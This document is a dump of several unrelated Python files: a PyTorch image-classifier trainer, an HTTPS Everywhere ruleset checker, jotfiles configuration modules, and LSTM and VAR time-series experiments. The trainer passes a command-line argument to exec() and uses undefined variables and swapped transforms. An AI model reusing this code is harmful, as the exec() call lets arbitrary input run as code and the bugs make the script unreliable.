parser.add_argument('--gpu',
action="store_true",
help='Use GPU + Cuda for calculations')
args = parser.parse_args()
return args
def train_transformer(train_dir):
train_transforms = transforms.Compose([transforms.RandomRotation(30),
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
train_data = datasets.ImageFolder(train_dir, transform=train_transforms)
return train_data
def test_transformer(test_dir):
test_transforms = transforms.Compose([transforms.Resize(256),
transforms.CenterCrop(224),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406],
[0.229, 0.224, 0.225])])
test_data = datasets.ImageFolder(test_dir, transform=test_transforms)
return test_data
def data_loader(data, train=True):
if train:
loader = torch.utils.data.DataLoader(data, batch_size=50, shuffle=True)
else:
loader = torch.utils.data.DataLoader(data, batch_size=50)
return loader
def check_gpu(gpu_arg):
if not gpu_arg:
return torch.device("cpu")
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
if device == "cpu":
print("CUDA was not found on device, using CPU instead.")
return device
def primaryloader_model(architecture="resnet152"):
if type(architecture) == type(None):
model = models.resnet152(pretrained=True)
model.name = "resnet152"
print("Network architecture specified as resnet152.")
else:
exec("model = models.{}(pretrained=True)".format(architecture))
model.name = architecture
for param in model.parameters():
param.requires_grad = False
return model
def initial_classifier(model, hidden_units):
if type(hidden_units) == type(None):
hidden_units = 4096 #hyperparamters
print("Number of Hidden Layers specificed as 4096.")
input_features = model.classifier[0].in_features
classifier = nn.Sequential(OrderedDict([
('fc1', nn.Linear(input_features, hidden_units, bias=True)),
('relu1', nn.ReLU()),
('dropout1', nn.Dropout(p=0.5)),
('fc2', nn.Linear(hidden_units, 102, bias=True)),
('output', nn.LogSoftmax(dim=1))
]))
return classifier
def validation(model, testloader, criterion, device):
test_loss = 0
accuracy = 0
for ii, (inputs, labels) in enumerate(testloader):
inputs, labels = inputs.to(device), labels.to(device)
output = model.forward(inputs)
test_loss += criterion(output, labels).item()
ps = torch.exp(output)
equality = (labels.data == ps.max(dim=1)[1])
accuracy += equality.type(torch.FloatTensor).mean()
return test_loss, accuracy
def network_trainer(Model, Trainloader, Testloader, Device,
Criterion, Optimizer, Epochs, Print_every, Steps):
if type(Epochs) == type(None):
Epochs = 4
print("Number of Epochs specificed as 4.")
print("In training process\n")
for e in range(Epochs):
running_loss = 0
Model.train()
for ii, (inputs, labels) in enumerate(Trainloader):
Steps += 1
inputs, labels = inputs.to(Device), labels.to(Device)
Optimizer.zero_grad()
outputs = model.forward(inputs)
loss = criterion(outputs, labels)
loss.backward()
optimizer.step()
running_loss += loss.item()
if steps % print_every == 0:
model.eval()
with torch.no_grad():
valid_loss, accuracy = validation(model, validloader, criterion)
print("Epoch: {}/{} | ".format(e+1, epochs),
"Training Loss: {:.4f} | ".format(running_loss/print_every),
"Validation Loss: {:.4f} | ".format(valid_loss/len(testloader)),
"Validation Accuracy: {:.4f}".format(accuracy/len(testloader)))
running_loss = 0
model.train()
return Model
def validate_model(Model, Testloader, Device):
correct = 0
total = 0
with torch.no_grad():
Model.eval()
for data in Testloader:
images, labels = data
images, labels = images.to(Device), labels.to(Device)
outputs = Model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print('Accuracy achieved by the network on test images is: %d%%' % (100 * correct / total))
def initial_checkpoint(Model, Save_Dir, Train_data):
if type(Save_Dir) == type(None):
print("Model checkpoint directory not specified, model will not be saved.")
else:
if isdir(Save_Dir):
Model.class_to_idx = Train_data.class_to_idx
checkpoint = {'architecture': Model.name,
'classifier': Model.classifier,
'class_to_idx': Model.class_to_idx,
'state_dict': Model.state_dict()}
torch.save(checkpoint, 'my_checkpoint.pth')
else:
print("Sorry, directory could not be found, model won't be saved.")
def main():
args = arg_parser()
data_dir = 'flowers'
train_dir = data_dir + '/train'
valid_dir = data_dir + '/valid'
test_dir = data_dir + '/test'
train_data = test_transformer(train_dir)
valid_data = train_transformer(valid_dir)
test_data = train_transformer(test_dir)
trainloader = data_loader(train_data)
validloader = data_loader(valid_data, train=False)
testloader = data_loader(test_data, train=False)
model = primaryloader_model(architecture=args.arch)
model.classifier = initial_classifier(model,
hidden_units=args.hidden_units)
device = check_gpu(gpu_arg=args.gpu);
model.to(device);
if type(args.learning_rate) == type(None):
learning_rate = 0.001
print("Learning rate specificed as 0.001")
else: learning_rate = args.learning_rate
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.classifier.parameters(), lr=learning_rate)
print_every = 30
steps = 0
trained_model = network_trainer(model, trainloader, validloader,
device, criterion, optimizer, args.epochs,
print_every, steps)
print("\nTraining process is now complete!!")
validate_model(trained_model, testloader, device)
initial_checkpoint(trained_model, args.save_dir, train_data)
if __name__ == '__main__': main()
``` |
{
"source": "jpds/https-everywhere",
"score": 2
} |
#### File: https-everywhere/utils/alexa-ruleset-checker.py
```python
import sys
import csv
import xml.etree.ElementTree as etree
import subprocess
import random
import urllib.request
import urllib.error
import zipfile
import os
import time
# Variables and constants
sitesList = []
# Temporary file containing the `git diff` between master and stable
tmpRulesFileName = "/tmp/rulesDiff-" + format(random.randrange(1,65535)) # Feel free to enlarge if needed
# URL of the Alexa Top1M
alexaTop1MURL = "http://s3.amazonaws.com/alexa-static/top-1m.csv.zip"
# alexaTop1MURL = "http://127.0.0.1/top-1m.csv.zip"
# Temporary file name, to aboid conflicts
tmpAlexaFileName = "/tmp/alexa-top1M-" + format(random.randrange(1,65535)) + ".csv"
# Logfile. Records the same output as the script
logFileName = "/tmp/alexa-ruleset-log-" + format(random.randrange(1,65535)) + ".log"
# Filename of the CSV file contained in the Alexa zipfile
tmpAlexaZipFileContents = 'top-1m.csv'
# Absolute path of the git repo (the folder containing src/)
# Remember to change this accordingly to your system, if you ever move the script
#
# By default, it refers to the parent directory of the one containing the script
# because the script was put in utils/
#
# __NEEDS A TRAILING SLASH__
#
# gitRepositoryPath = os.path.abspath(os.path.join(os.curdir, os.pardir))
gitRepositoryPath = os.path.abspath(os.path.join(os.curdir, os.pardir)) + "/"
# Maximum number of websites to use in the Alexa Top 1M (i.e. it's no longer 1M but maxSitesNumber)
# Set to -1 for 'unlimited'
maxSitesNumber = 1000
# Functions
def ruleLookup(target):
try: # list.index(value) throus an exception for a "not found", so if it throws it, it's not found
sitesList.index(target)
return 1
except:
return 0
# Fetch the Alexa Top 1M - http://stackoverflow.com/questions/1517616/stream-large-binary-files-with-urllib2-to-file
try:
print("Retrieving Alexa Top1M from", alexaTop1MURL)
tmpAlexaZipFileName, headers = urllib.request.urlretrieve(alexaTop1MURL)
print("File downloaded and stored in %s" % tmpAlexaZipFileName)
except urllib.error.URLError as e:
print("Failed to download Alexa Top 1M")
sys.exit('Error message: %s' % e)
# Now unzip it
try:
# Extract in /tmp/
print("Start extracting %s" % tmpAlexaZipFileName)
tmpAlexaZipFile = zipfile.ZipFile(tmpAlexaZipFileName,'r')
tmpAlexaZipFile.extractall('/tmp/')
except zipfile.BadZipfile:
sys.exit("The zip file %s is corrupted.",tmpAlexaZipFileName)
try:
# Rename the file to match the file with the random in it
os.rename('/tmp/' + tmpAlexaZipFileContents,tmpAlexaFileName)
print("Alexa Top1M retrieved and stored in %s" % tmpAlexaFileName)
except OSError as e:
print("Failed to rename /tmp/top-1M.csv to %s." % (tmpAlexaFileName))
sys.exit('Error message: %s' % (e))
# Handles reading the Alexa Top 1M and pushing all sites in a list
sitesReader = csv.reader(open(tmpAlexaFileName), delimiter=',', quotechar='"')
for row in sitesReader:
try:
# Since some Alexa sites are not FQDNs, split where there's a "/" and keep ony the first part
siteFQDN = sitesList.append(row[1].split("/",1)[0])
# print("Line %s: %s" % (sitesReader.line_num, sitesList[len(sitesList) - 1])) # Outputs the current line
if sitesReader.line_num == maxSitesNumber:
break
except csv.Error as e:
sys.exit('file %s, line %d: %s' % (tmpAlexaFileName, sitesReader.line_num, e))
# `git diff` the master revision against stable, rules folder only
try:
print("Create git diff between master and stable in %s" % tmpRulesFileName)
tmpRulesFile = open(tmpRulesFileName,"w")
#subprocess.call(['git', 'diff', '--name-status', 'master..remotes/origin/stable', '../src/chrome/content/rules'], stdout=tmpRulesFile)
subprocess.call(['git', 'diff', '--name-status', 'remotes/origin/stable..master', '../src/chrome/content/rules'], stdout=tmpRulesFile)
tmpRulesFile.close()
except OSError as e:
sys.exit('An OSError exception was raised: %s' % (e))
rulesList = open(tmpRulesFileName, 'r')
logFile = open(logFileName,'w')
logFile.write("Log file generated on %s.\nPaths are relative to the root directory of the git repo.\n\n" % time.strftime("%Y-%m-%d %H:%M:%S"))
# Let's keep track of how many rules were added and how many were modified
# Must be declared here or won't be available at the end of the loop
countAddedRules = 0
countEditedRules = 0
# Start parsing the list
for line in rulesList:
try:
# Split into "file mode in commit + file path"
ruleFile = line.split()
found = 0
# If file mode is "A" (add) or "M" (edited)
if ruleFile[0] == "A" or ruleFile[0] == "M": # If file was added or edited between stable and master, parse
ruleFileObject= open(gitRepositoryPath + ruleFile[1])
ruleText = etree.parse(ruleFileObject) # ADJUST FILE PATH (here is '../') IF YOU MOVE THE SCRIPT - XXX: Obsolete warning?
for target in ruleText.findall('target'):
FQDN = target.get('host') # URL of the website
if ruleLookup(FQDN) == 1: # Look it up in the sitesList
# Message different according to file mode
if ruleFile[0] == "A": # New
found = "NEW"
countAddedRules = countAddedRules + 1
break
elif ruleFile[0] == "M": # Edited
found = "EDITED"
countEditedRules = countEditedRules + 1
break
# If found, print it TABULATED
if found != 0:
print("%s:\t%s" % (found, ruleFile[1]))
logFile.write("%s:\t%s" % (found, ruleFile[1]))
# else ignore
# There are some problems with file name encoding. So, for now, just print an error and pass
except FileNotFoundError as e: # Won't happen before line.split() is invoked
print("File not found:", ruleFile[1])
# logFile.write ("File not found: %s\n" % ruleFile[1])
logFile.write("%s\n" % e)
pass
except IOError as ioe: #Treated same as FileNotFoundError
print("File not found:", ruleFile[1])
# logFile.write ("File not found: %s\n" % ruleFile[1])
logFile.write("%s\n" % e)
pass
# Print our simple statistics
print("\n\nStatistics:\nParsed rules: %s\nNewly added rules: %s\nEdited rules: %d" % (maxSitesNumber, countAddedRules, countEditedRules))
logFile.write("\n\nStatistics:\nParsed rules: %s\nNewly added rules: %s\nEdited rules: %d" % (maxSitesNumber, countAddedRules, countEditedRules))
print("\n\nLog file can be found at %s" % logFileName)
# Close the rules file
rulesList.close()
# And the log file
logFile.close()
``` |
{
"source": "JPDSousa/jotfiles",
"score": 2
} |
#### File: jotfiles/docs/conf.py
```python
import datetime
import os
import sys
sys.path.insert(0, os.path.abspath("."))
sys.path.insert(0, os.path.abspath("../"))
from jotfiles import __meta__ as meta # noqa: E402 isort:skip
# -- Project information -----------------------------------------------------
now = datetime.datetime.now()
project = meta.name
project_path = meta.path
author = meta.author
copyright = "{}, {}".format(now.year, author)
# The full version, including alpha/beta/rc tags
release = meta.version
# The short X.Y version
version = ".".join(release.split(".")[0:2])
# -- Automatically generate API documentation --------------------------------
def run_apidoc(_):
"""
Call apidoc, with customised set up.
"""
ignore_paths = [
os.path.join("..", project_path, "tests"),
]
argv = [
"--force", # Overwrite output files
"--follow-links", # Follow symbolic links
"--separate", # Put each module file in its own page
"--module-first", # Put module documentation before submodule
"-o",
"source/packages", # Output path
os.path.join("..", project_path),
] + ignore_paths
try:
# Sphinx 1.7+
from sphinx.ext import apidoc
apidoc.main(argv)
except ImportError:
# Sphinx 1.6 (and earlier)
from sphinx import apidoc
argv.insert(0, apidoc.__file__)
apidoc.main(argv)
def retitle_modules(_):
"""
Overwrite the title of the modules.rst file.
"""
pth = "source/packages/modules.rst"
lines = open(pth).read().splitlines()
# Overwrite the junk in the first two lines with a better title
lines[0] = "API Reference"
lines[1] = "============="
open(pth, "w").write("\n".join(lines))
def setup(app):
"""
Set up our apidoc commands to run whenever sphinx is built.
"""
app.connect("builder-inited", run_apidoc)
app.connect("builder-inited", retitle_modules)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.intersphinx",
"sphinx.ext.todo",
"sphinx.ext.coverage",
"sphinx.ext.mathjax",
"sphinx.ext.ifconfig",
"sphinx.ext.viewcode",
"sphinx.ext.napoleon",
]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_init_with_doc = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = False
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
source_suffix = [".rst", ".md"]
# The master toctree document.
master_doc = "index"
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = project + "doc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, project + ".tex", project + " Documentation", meta.author, "manual"),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [(master_doc, project, project + " Documentation", [author], 1)]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
project,
project + " Documentation",
author,
project,
meta.description,
"Miscellaneous",
),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ["search.html"]
# -- Extension configuration -------------------------------------------------
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://docs.python.org/", None),
"NumPy": ("https://docs.scipy.org/doc/numpy/", None),
"SciPy": ("https://docs.scipy.org/doc/scipy/reference", None),
"matplotlib": ("https://matplotlib.org", None),
"sklearn": ("https://scikit-learn.org/stable", None),
"Pillow": ("https://pillow.readthedocs.io/en/stable/", None),
"skimage": ("https://github.com/scikit-image/docs/raw/gh-pages/dev", None),
}
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
```
#### File: jotfiles/jotfiles/container.py
```python
from dependency_injector import containers, providers
from jotfiles.components import PersonalBoard
from jotfiles.comunication import Chat, ScheduledMessagesPool
from jotfiles.google import GChat
from jotfiles.jira_m import Config as JIRAConfig
from jotfiles.jira_m import JiraScrumBoard
from jotfiles.jira_m import load_from_file as load_jira_from_file
from jotfiles.scrum import ScrumBoard
from jotfiles.trello_m import TrelloPersonalBoard, TrelloScheduledMessagesPool
from jotfiles.trello_m import load_from_file as load_trello_from_file
from jotfiles.workflow_hooks import LocalWorkflow
def load_personal_space(config, trello_client, trello_config) -> PersonalBoard:
personal_board = config["personal_board"]
if personal_board == "trello":
return TrelloPersonalBoard(trello_client(), trello_config.board_id)
else:
raise ValueError(f"Unknown personal space type {personal_board}")
def load_scrum_board(config, jira_config) -> ScrumBoard:
scrum_board = config["scrum_board"]
if scrum_board == "jira":
return JiraScrumBoard(jira_config)
else:
raise ValueError(f"Unknown scrum board type {scrum_board}")
def load_smpool(config, trello_client) -> ScheduledMessagesPool:
smpool = config["smpool"]
if smpool == "trello":
return TrelloScheduledMessagesPool(trello_client())
else:
raise ValueError(f"Unknown scheduled messages pool type {smpool}")
def load_chat(config) -> Chat:
chat = config["chat"]
if chat == "gchat":
return GChat({})
else:
raise ValueError(f"Unknown chat type {chat}")
class Container(containers.DeclarativeContainer):
config = providers.Configuration()
trello_config = providers.Singleton(
load_trello_from_file, config.trello_credentials
)
trello_client = providers.Singleton(trello_config.provided.create_client)
personal_board = providers.Singleton(
load_personal_space, config, trello_client, trello_config
)
jira_config: JIRAConfig = providers.Singleton(
load_jira_from_file, config.jira_credentials
)
scrum_board = providers.Singleton(load_scrum_board, config, jira_config)
smpool = providers.Singleton(load_smpool, config, trello_client)
chat = providers.Singleton(load_chat, config)
workflow = providers.Singleton(
LocalWorkflow, scrum_board, personal_board, smpool, chat
)
```
#### File: jotfiles/jotfiles/workflow_poller.py
```python
import logging
import time
from pathlib import Path
import schedule
from pydantic import BaseSettings
from jotfiles.container import Container
logger = logging.getLogger(__name__)
class Config(BaseSettings):
personal_board: str = "trello"
scrum_board: str = "jira"
chat: str = "gchat"
smpool: str = "trello"
workflow_mode: str = "local"
base_path: Path = Path()
trello_credentials: Path = base_path / "credentials_trello.json"
jira_credentials: Path = base_path / "credentials_jira.json"
def bootstrap_poller():
container = Container()
container.config.from_pydantic(Config())
workflow = container.workflow()
personal_board = container.personal_board()
logger.info("Scheduling actions")
# this should be dynamic / decoupled
schedule.every().hour.do(workflow.update_sprint_issues)
schedule.every().hour.do(personal_board.update_done)
logger.info("All actions scheduled")
while True:
schedule.run_pending()
time.sleep(1)
if __name__ == "__main__":
bootstrap_poller()
``` |
{
"source": "JPDucky/Time-Series-Methods-Research",
"score": 2
} |
#### File: JPDucky/Time-Series-Methods-Research/lstm injprod.py
```python
from math import sqrt
from numpy import concatenate
from matplotlib import pyplot
from pandas import read_csv
from pandas import DataFrame
from pandas import concat
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
# convert series to supervised learning
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
n_vars = 1 if type(data) is list else data.shape[1]
df = DataFrame(data)
cols, names = list(), list()
# input sequence (t-n, ... t-1)
for i in range(n_in, 0, -1):
cols.append(df.shift(i))
names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# forecast sequence (t, t+1, ... t+n)
for i in range(0, n_out):
cols.append(df.shift(-i))
if i == 0:
names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
else:
names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# put it all together
agg = concat(cols, axis=1)
agg.columns = names
# drop rows with NaN values
if dropnan:
agg.dropna(inplace=True)
return agg
# load dataset
dataset = read_csv('C:\\Users\jpdub\injprod1.csv', header=0, index_col=0)
values = dataset.values
# integer encode direction
encoder = LabelEncoder()
values[:,4] = encoder.fit_transform(values[:,4])
# ensure all data is float
values = values.astype('float32')
# normalize features
scaler = MinMaxScaler(feature_range=(0, 1))
scaled = scaler.fit_transform(values)
# frame as supervised learning
reframed = series_to_supervised(scaled, 1, 1)
# drop columns we don't want to predict
reframed.drop(reframed.columns[[9,10,11,12,13,14,15]], axis=1, inplace=True)
print(reframed.head())
# split into train and test sets
values = reframed.values
n_train_hours = 365 * 24
train = values[:n_train_hours, :]
test = values[n_train_hours:, :]
# split into input and outputs
train_X, train_y = train[:, :-1], train[:, -1]
test_X, test_y = test[:, :-1], test[:, -1]
# reshape input to be 3D [samples, timesteps, features]
train_X = train_X.reshape((train_X.shape[0], 1, train_X.shape[1]))
test_X = test_X.reshape((test_X.shape[0], 1, test_X.shape[1]))
print(train_X.shape, train_y.shape, test_X.shape, test_y.shape)
# design network
model = Sequential()
model.add(LSTM(50, input_shape=(train_X.shape[1], train_X.shape[2])))
model.add(Dense(1))
model.compile(loss='mae', optimizer='adam')
# fit network
history = model.fit(train_X, train_y, epochs=50, batch_size=72, validation_data=(test_X, test_y), verbose=2, shuffle=False)
# plot history
pyplot.plot(history.history['loss'], label='train')
pyplot.plot(history.history['val_loss'], label='test')
pyplot.legend()
pyplot.show()
# make a prediction
yhat = model.predict(test_X)
test_X = test_X.reshape((test_X.shape[0], test_X.shape[2]))
# invert scaling for forecast
inv_yhat = concatenate((yhat, test_X[:, 1:]), axis=1)
inv_yhat = scaler.inverse_transform(inv_yhat)
inv_yhat = inv_yhat[:,0]
# invert scaling for actual
test_y = test_y.reshape((len(test_y), 1))
inv_y = concatenate((test_y, test_X[:, 1:]), axis=1)
inv_y = scaler.inverse_transform(inv_y)
inv_y = inv_y[:,0]
# calculate RMSE
rmse = sqrt(mean_squared_error(inv_y, inv_yhat))
print('Test RMSE: %.3f' % rmse)
```
#### File: JPDucky/Time-Series-Methods-Research/multivlstm with lag (stock).py
```python
from math import sqrt
from numpy import concatenate
from matplotlib import pyplot as plt
from pandas import read_csv
from pandas import DataFrame
from pandas import concat
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
import numpy as np
import seaborn as sns
import pandas as pd
import matplotlib
matplotlib.use('GTKAgg')
# convert series to supervised learning
def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
n_vars = 1 if type(data) is list else data.shape[1] # create var n_vars, set number of variables to that in array
df = DataFrame(data)
cols, names = list(), list()
# input sequence (t-n, ... t-1)
for i in range(n_in, 0, -1):
cols.append(df.shift(i))
names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# forecast sequence (t, t+1, ... t+n)
for i in range(0, n_out):
cols.append(df.shift(-i))
if i == 0:
names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
else:
names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# put it all together
agg = concat(cols, axis=1)
agg.columns = names
# drop rows with NaN values
if dropnan:
agg.dropna(inplace=True)
return agg
##Create a differenced dataset inverse =============== reverse the function
#def difference(dataset, interval=1):
# diff = list()
# for i in range(interval, len(dataset)):
# value = dataset[i] - dataset[i - interval]
# diff.append(value)
# return dataset1(diff)
#
##Invert differenced value
#def inverse_difference(history, yhat, interval=1):
# return yhat + history[-interval]
# load dataset
dataframe = read_csv('C:\\Users\\jpdub\\Documents\\School\\PETE 4998\\IMMU.csv', header=0, index_col=0)
#print(dataframe.head(5))
#dataset1 = dataframe[['cum_oil_prod', 'cum_gas_prod', 'cum_water_prod', 'cum_water_inj']]
dataset1 = dataframe#[['date', 'open', 'high', 'low', 'close', 'adj close', 'volume']] #import all columns for stock
var = dataframe[['High']]
#print(dataset1.shape) #(376, 4)
values = dataset1.values #[:374]
#print(values[:5])
#print(values.shape)
#dataset.tail(30)
# integer encode direction
#encoder = LabelEncoder()
#values[:,3] = encoder.fit_transform(values[:,3])
#print(values[:5])
#print(values.shape) #(376, 4)
# ensure all data is float
values = values.astype('float32')
print(values.shape)
# normalize features
scaler = MinMaxScaler(feature_range=(0, 1))
scaled = scaler.fit_transform(values)
#print(scaled.shape) #(376, 4)
length = np.size(dataset1, axis=1)
#length = length - 1
#Specify number of lags
n_lag= 50
n_features = length
# frame as supervised learning
reframed = series_to_supervised(scaled, n_lag, 1)
#print(reframed.shape) #(375, 8)
#print(reframed.columns)
# drop columns we don't want to predict
reframed.drop(reframed.columns[[6, 8, 9, 10, 11]], axis=1, inplace=True)
#print(reframed.shape) #(375, 5)
#print(reframed) #yup all 5 are there, dunno why reframed shape is 8{[?]} == its the (t-1) variables lol
# split into train and test sets
values1 = reframed.values
n_train = int(values1.shape[0]*0.6)
train = values1[:n_train, :]
test = values1[n_train:, :]
# split into input and outputs
n_obs = n_lag * n_features
train_X, train_y = train[:, :n_obs], train[:, -n_features]
test_X, test_y = test[:, :n_obs], test[:, -n_features]
# reshape input to be 3D [samples, timesteps, features] <<<<<<<================ yooooooooooooooooooooooooo read this shit!!!!!!
train_X = train_X.reshape((train_X.shape[0], n_lag, n_features))
test_X = test_X.reshape((test_X.shape[0], n_lag, n_features))
print(train_X.shape, train_y.shape, test_X.shape, test_y.shape)
# hyperparameters
nodes = 29
#print(train_X.shape[])
#print(train_X.shape) #(250,3) [0]= 250 , [1]= 3
#input_shape = (train_X.shape[1], train_X.shape[2])
#print(input_shape) #(1, 6)
# design network
model = Sequential() # ( 1 , 6 )
model.add(LSTM(nodes, input_shape=(train_X.shape[1], train_X.shape[2])))
model.add(Dense(1))
model.compile(loss='msle', optimizer='adam', metrics=['accuracy'])
# fit network
history = model.fit(train_X, train_y, epochs=1000, batch_size=64, validation_data=(test_X, test_y), verbose=2, shuffle=False)
#print(len(history.history))
# plot history
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='test')
plt.legend()
plt.show()
# make a prediction
testPredict = model.predict(test_X) #generates output predictions for the input samples
trainPredict = model.predict(train_X)
#print('test predict')
#print(testPredict.shape) #(125, 1)
#print(test_X.shape)
test_X = test_X.reshape((test_X.shape[0], n_lag*n_features))
train_X = train_X.reshape((train_X.shape[0], n_lag*n_features))
#print('testx')
#print(test_X.shape) #(125, 5)
# invert scaling for forecast
inv_testPredict = concatenate((testPredict, test_X[:, -5:]), axis=1) #knocks off the first column and sticks the two variables together in the same array
inv_trainPredict = concatenate((trainPredict, train_X[:, -5:]), axis=1)
#print('tpd')
#print(inv_testPredict.shape)
#print(inv_testPredict.shape) #(125, 5)
inv_testPredict = scaler.inverse_transform(inv_testPredict)
inv_testPredict = inv_testPredict[:,0]
inv_trainPredict = scaler.inverse_transform(inv_trainPredict)
inv_trainPredict = inv_trainPredict[:,0]
#print(inv_testPredict)
# invert scaling for actual
test_y = test_y.reshape((len(test_y), 1))
inv_ytest = concatenate((test_y, test_X[:, -5:]), axis=1)
inv_ytest = scaler.inverse_transform(inv_ytest)
inv_ytest = inv_ytest[:,0]
print(train_y.shape)
train_y = train_y.reshape((len(train_y), 1))
inv_ytrain = concatenate((train_y, train_X[:, -5:]), axis=1)
inv_ytrain = scaler.inverse_transform(inv_ytrain)
inv_ytrain = inv_ytrain[:,0]
# calculate RMSE
rmse = sqrt(mean_squared_error(inv_ytest, inv_testPredict))
print('Test RMSE: %.3f' % rmse)
print(inv_ytest[-1])
#Shift the plot for n_lag
pad = np.arange(n_lag)
for i in pad[0:n_lag]:
pad[i] = 0
#print(pad)
#print(pad.shape)
#pad = pad.reshape(pad(n_lag), (len(n_lag)))
#put the predicted train and test datasets together
predicted_vals = concatenate((pad, inv_ytrain, inv_ytest), axis=0)
#plt.figure(figsize=(20,10))
plt.xlabel('Time')
plt.ylabel('Price')
plt.plot(predicted_vals, 'r')
#print(predicted_vals.shape)
#print(var.shape)
plt.plot(var, 'g')#need to get in inverse--> done
#print(max(predicted_vals))
#print(min(predicted_vals))
print('Predicted Max: %.3f' % predicted_vals[-1])
```
#### File: JPDucky/Time-Series-Methods-Research/VAR2.py
```python
import numpy as np
import pandas as pd
import statsmodels.api as sm
from statsmodels.tsa.api import VAR, DynamicVAR
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import LabelEncoder
from sklearn.metrics import mean_squared_error
## convert series to supervised learning
#def series_to_supervised(data, n_in=1, n_out=1, dropnan=True):
# n_vars = 1 if type(data) is list else data.shape[1]
# df = DataFrame(data)
# cols, names = list(), list()
# # input sequence (t-n, ... t-1)
# for i in range(n_in, 0, -1):
# cols.append(df.shift(i))
# names += [('var%d(t-%d)' % (j+1, i)) for j in range(n_vars)]
# # forecast sequence (t, t+1, ... t+n)
# for i in range(0, n_out):
# cols.append(df.shift(-i))
# if i == 0:
# names += [('var%d(t)' % (j+1)) for j in range(n_vars)]
# else:
# names += [('var%d(t+%d)' % (j+1, i)) for j in range(n_vars)]
# # put it all together
# agg = concat(cols, axis=1)
# agg.columns = names
# # drop rows with NaN values
# if dropnan:
# agg.dropna(inplace=True)
# return agg
df = pd.read_csv("red_river_b_datacum.csv", header=0, index_col=0) #parse_dates=[['Date']])
df_new = df[['cum_oil_prod', 'cum_gas_prod', 'cum_water_prod', 'cum_water_inj', 'sum_max_pres']]#, 'gas_prod', 'water_prod', 'water_cut', 'sum_tot_inj', 'days_inj', 'sum_inj_rate', 'thick', 'phi', 'k', 'compr', 'Swi', 'oil_dens', 'pres_aband', 'viscos_bp', 'fvf', 'press_init']]
print(df_new.head())
df_new = df_new[:350]
data = df_new
